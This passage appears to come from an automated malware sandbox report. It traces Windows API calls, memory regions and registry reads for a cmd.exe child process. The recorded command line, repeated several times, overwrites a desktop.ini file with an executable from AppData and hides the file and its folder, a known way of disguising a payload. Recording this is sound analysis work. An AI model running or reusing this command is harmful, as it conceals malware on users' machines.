(_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x32, 
lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] GetFileType (hFile=0x4c) returned 0x1 [0236.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.150] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x32, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.150] _close (_FileHandle=4) returned 0 [0236.151] FindNextFileW (in: hFindFile=0x440e78, lpFindFileData=0x2eee2c | out: lpFindFileData=0x2eee2c) returned 0 [0236.151] GetLastError () returned 0x12 [0236.151] FindClose (in: hFindFile=0x440e78 | out: hFindFile=0x440e78) returned 1 [0236.151] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0236.152] _close (_FileHandle=3) returned 0 [0236.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.152] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.152] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.152] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.152] SetConsoleInputExeNameW () returned 0x1 [0236.152] GetConsoleOutputCP () returned 0x1b5 [0236.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.153] exit (_Code=0) Process: id = "646" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xa40" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35585 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35586 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35587 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35588 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35589 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35590 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35591 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35592 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35593 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 35594 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35643 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35644 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35645 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35646 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35647 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 35648 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35649 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35650 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35651 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35652 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35653 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35654 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35655 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35656 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35657 start_va = 0xf0000 end_va = 0x1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 35658 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
35659 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35660 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35661 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35662 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35663 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35664 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35665 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 35666 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 35691 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 887 os_tid = 0x600 [0236.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf80c | out: lpSystemTimeAsFileTime=0x2cf80c*(dwLowDateTime=0xc02ca120, dwHighDateTime=0x1d440a9)) [0236.081] GetCurrentProcessId () returned 0xa40 [0236.081] GetCurrentThreadId () returned 0x600 [0236.081] GetTickCount () returned 0x40cac [0236.081] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf804 | out: 
lpPerformanceCount=0x2cf804*=29287162102) returned 1 [0236.083] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0236.083] __set_app_type (_Type=0x1) [0236.083] __p__fmode () returned 0x76b331f4 [0236.083] __p__commode () returned 0x76b331fc [0236.083] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0236.083] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0236.084] GetCurrentThreadId () returned 0x600 [0236.084] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x600) returned 0x38 [0236.084] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.084] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.084] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.093] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf79c | out: phkResult=0x2cf79c*=0x0) returned 0x2 [0236.093] VirtualQuery (in: lpAddress=0x2cf7d3, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0236.093] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf76c, dwLength=0x1c | out: lpBuffer=0x2cf76c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.094] GetConsoleOutputCP () returned 0x1b5 [0236.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.094] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0236.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.095] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.095] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.096] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.096] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.096] GetEnvironmentStringsW () returned 0x4a04a0* [0236.096] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.096] GetEnvironmentStringsW () returned 0x4a04a0* [0236.096] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce70c | out: phkResult=0x2ce70c*=0x40) returned 0x0 [0236.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x50, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x0, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegCloseKey (hKey=0x40) returned 0x0 [0236.097] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce70c | out: phkResult=0x2ce70c*=0x40) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: 
lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x40, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x1, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x0, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x4, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x4) returned 0x0 [0236.097] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce714, lpData=0x2ce718, lpcbData=0x2ce710*=0x1000 | out: lpType=0x2ce714*=0x0, lpData=0x2ce718*=0x9, lpcbData=0x2ce710*=0x1000) returned 0x2 [0236.097] RegCloseKey (hKey=0x40) returned 0x0 [0236.097] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0236.097] srand (_Seed=0x5b8863c3) [0236.097] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" [0236.097] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" [0236.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.098] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a1c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.098] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.098] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.098] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.098] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.098] _wcsicmp (_String1="PROMPT", 
_String2="RANDOM") returned -2 [0236.098] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.098] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.098] GetEnvironmentStringsW () returned 0x4a25f0* [0236.098] FreeEnvironmentStringsW (penv=0x4a25f0) returned 1 [0236.098] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.098] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.098] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.098] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.098] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.098] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.098] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.098] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.099] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf4d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf4d8, lpFilePart=0x2cf4d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf4d4*="Desktop") returned 0x18 [0236.099] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 
0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf254 | out: lpFindFileData=0x2cf254) returned 0x4a0c80 [0236.099] FindClose (in: hFindFile=0x4a0c80 | out: hFindFile=0x4a0c80) returned 1 [0236.099] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.099] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.100] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.100] GetEnvironmentStringsW () returned 0x4a04a0* [0236.100] FreeEnvironmentStringsW (penv=0x4a04a0) returned 1 [0236.100] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.100] GetConsoleOutputCP () returned 0x1b5 [0236.104] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.104] GetUserDefaultLCID () returned 0x409 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf618, cchData=128 | out: lpLCData="0") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf618, cchData=128 | out: lpLCData="0") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf618, cchData=128 | out: lpLCData="1") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 
